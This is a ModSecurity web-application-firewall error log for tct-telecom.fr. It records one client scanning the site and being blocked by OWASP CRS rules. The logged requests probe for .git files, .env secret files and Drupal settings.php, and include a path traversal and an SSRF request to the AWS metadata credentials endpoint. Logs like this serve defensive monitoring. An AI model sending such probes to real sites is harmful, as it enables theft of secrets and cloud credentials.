[Mon May 11 12:58:15.241346 2026] [security2:error] [pid 1256241:tid 1256264] [client 195.178.110.133:55916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q5kIEwRJMyDaV55jIwAAAVI"]
[Mon May 11 12:58:15.248022 2026] [security2:error] [pid 1254179:tid 1254194] [client 195.178.110.133:55894] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q2S6k_SCYd1AVZrGCAAAAQ0"]
[Mon May 11 12:58:15.280644 2026] [security2:error] [pid 1254242:tid 1254249] [client 195.178.110.133:55998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q74KNmD_mZ_vlf9P2wAAAEM"]
[Mon May 11 12:58:15.351660 2026] [security2:error] [pid 1256241:tid 1256259] [client 195.178.110.133:55974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q5kIEwRJMyDaV55jIgAAAU0"]
[Mon May 11 12:58:15.861465 2026] [security2:error] [pid 1256241:tid 1256270] [client 195.178.110.133:56198] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/config"] [unique_id "agG2R5kIEwRJMyDaV55jKgAAAVg"]
[Mon May 11 12:58:15.861595 2026] [security2:error] [pid 1256241:tid 1256270] [client 195.178.110.133:56198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/config"] [unique_id "agG2R5kIEwRJMyDaV55jKgAAAVg"]
[Mon May 11 12:58:15.865476 2026] [security2:error] [pid 1254179:tid 1254181] [client 195.178.110.133:56170] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agG2R2S6k_SCYd1AVZrGDwAAAQA"]
[Mon May 11 12:58:15.872369 2026] [security2:error] [pid 1254179:tid 1254181] [client 195.178.110.133:56170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agG2R2S6k_SCYd1AVZrGDwAAAQA"]
[Mon May 11 12:58:15.934845 2026] [security2:error] [pid 1254328:tid 1254332] [client 195.178.110.133:56226] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/index"] [unique_id "agG2R0Rdw2n9wv6Ai48dzgAAAIE"]
[Mon May 11 12:58:15.935045 2026] [security2:error] [pid 1254328:tid 1254332] [client 195.178.110.133:56226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/index"] [unique_id "agG2R0Rdw2n9wv6Ai48dzgAAAIE"]
[Mon May 11 12:58:16.384181 2026] [security2:error] [pid 1254133:tid 1254155] [client 195.178.110.133:55858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2QxjZymfuKpjWXeiSYAAAANM"]
[Mon May 11 12:58:16.452232 2026] [security2:error] [pid 1256241:tid 1256251] [client 195.178.110.133:56350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env~"] [unique_id "agG2SJkIEwRJMyDaV55jKwAAAUU"]
[Mon May 11 12:58:16.452421 2026] [security2:error] [pid 1256241:tid 1256251] [client 195.178.110.133:56350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env~"] [unique_id "agG2SJkIEwRJMyDaV55jKwAAAUU"]
[Mon May 11 12:58:16.455880 2026] [security2:error] [pid 1254133:tid 1254150] [client 195.178.110.133:56310] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agG2SBjZymfuKpjWXeiSagAAAM4"]
[Mon May 11 12:58:16.456051 2026] [security2:error] [pid 1254133:tid 1254150] [client 195.178.110.133:56310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agG2SBjZymfuKpjWXeiSagAAAM4"]
[Mon May 11 12:58:16.456994 2026] [security2:error] [pid 1254242:tid 1254252] [client 195.178.110.133:56326] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agG2SL4KNmD_mZ_vlf9P5AAAAEc"]
[Mon May 11 12:58:16.457178 2026] [security2:error] [pid 1254242:tid 1254252] [client 195.178.110.133:56326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agG2SL4KNmD_mZ_vlf9P5AAAAEc"]
[Mon May 11 12:58:16.471435 2026] [core:error] [pid 1254328:tid 1254339] [client 195.178.110.133:56292] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 12:58:16.472692 2026] [security2:error] [pid 1254179:tid 1254185] [client 195.178.110.133:56284] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agG2SGS6k_SCYd1AVZrGEgAAAQQ"]
[Mon May 11 12:58:16.472919 2026] [security2:error] [pid 1254179:tid 1254185] [client 195.178.110.133:56284] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agG2SGS6k_SCYd1AVZrGEgAAAQQ"]
[Mon May 11 12:58:16.505710 2026] [security2:error] [pid 1256241:tid 1256255] [client 195.178.110.133:56324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agG2SJkIEwRJMyDaV55jLAAAAUk"]
[Mon May 11 12:58:16.505919 2026] [security2:error] [pid 1256241:tid 1256255] [client 195.178.110.133:56324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agG2SJkIEwRJMyDaV55jLAAAAUk"]
[Mon May 11 12:58:16.545934 2026] [security2:error] [pid 1254212:tid 1254220] [client 195.178.110.133:56342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agG2SEYQeUtAPynIs6xuOQAAAAY"]
[Mon May 11 12:58:16.546763 2026] [security2:error] [pid 1254212:tid 1254220] [client 195.178.110.133:56342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agG2SEYQeUtAPynIs6xuOQAAAAY"]
[Mon May 11 12:58:16.558787 2026] [security2:error] [pid 1254212:tid 1254223] [client 195.178.110.133:56304] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tct-telecom.fr"] [uri "/_next/image"] [unique_id "agG2SEYQeUtAPynIs6xuOAAAAAk"]
[Mon May 11 12:58:16.559684 2026] [security2:error] [pid 1254212:tid 1254223] [client 195.178.110.133:56304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_next/image"] [unique_id "agG2SEYQeUtAPynIs6xuOAAAAAk"]
[Mon May 11 12:58:16.902455 2026] [security2:error] [pid 1254328:tid 1254347] [client 195.178.110.133:55932] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Q0Rdw2n9wv6Ai48dxwAAAJE"]
[Mon May 11 12:58:17.021420 2026] [security2:error] [pid 1256241:tid 1256257] [client 195.178.110.133:56440] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tct-telecom.fr"] [uri "/_next/image"] [unique_id "agG2SZkIEwRJMyDaV55jLgAAAUs"]
[Mon May 11 12:58:17.022137 2026] [security2:error] [pid 1256241:tid 1256257] [client 195.178.110.133:56440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_next/image"] [unique_id "agG2SZkIEwRJMyDaV55jLgAAAUs"]
[Mon May 11 12:58:18.231401 2026] [security2:error] [pid 1254242:tid 1254253] [client 195.178.110.133:56082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2Rb4KNmD_mZ_vlf9P3wAAAEg"]
[Mon May 11 12:58:18.303708 2026] [security2:error] [pid 1256241:tid 1256262] [client 195.178.110.133:56058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2RZkIEwRJMyDaV55jKAAAAVA"]
[Mon May 11 12:58:18.795667 2026] [security2:error] [pid 1254179:tid 1254191] [client 195.178.110.133:56134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2RWS6k_SCYd1AVZrGDgAAAQo"]
[Mon May 11 12:58:18.926879 2026] [security2:error] [pid 1254133:tid 1254151] [client 195.178.110.133:56122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2RRjZymfuKpjWXeiSZQAAAM8"]
[Mon May 11 12:58:21.215988 2026] [security2:error] [pid 1256241:tid 1256255] [client 195.178.110.133:56324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2SJkIEwRJMyDaV55jLAAAAUk"]
[Mon May 11 12:58:21.303087 2026] [security2:error] [pid 1254179:tid 1254181] [client 195.178.110.133:56170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2R2S6k_SCYd1AVZrGDwAAAQA"]
[Mon May 11 12:58:21.800427 2026] [security2:error] [pid 1254328:tid 1254332] [client 195.178.110.133:56226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2R0Rdw2n9wv6Ai48dzgAAAIE"]
[Mon May 11 12:58:22.450450 2026] [security2:error] [pid 1254242:tid 1254252] [client 195.178.110.133:56326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2SL4KNmD_mZ_vlf9P5AAAAEc"]
[Mon May 11 12:58:22.473422 2026] [security2:error] [pid 1256241:tid 1256270] [client 195.178.110.133:56198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2R5kIEwRJMyDaV55jKgAAAVg"]
[Mon May 11 12:58:22.536445 2026] [security2:error] [pid 1254133:tid 1254150] [client 195.178.110.133:56310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2SBjZymfuKpjWXeiSagAAAM4"]
[Mon May 11 12:58:23.025471 2026] [security2:error] [pid 1254179:tid 1254185] [client 195.178.110.133:56284] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2SGS6k_SCYd1AVZrGEgAAAQQ"]
[Mon May 11 12:58:23.032084 2026] [security2:error] [pid 1254212:tid 1254223] [client 195.178.110.133:56304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agG2SEYQeUtAPynIs6xuOAAAAAk"]
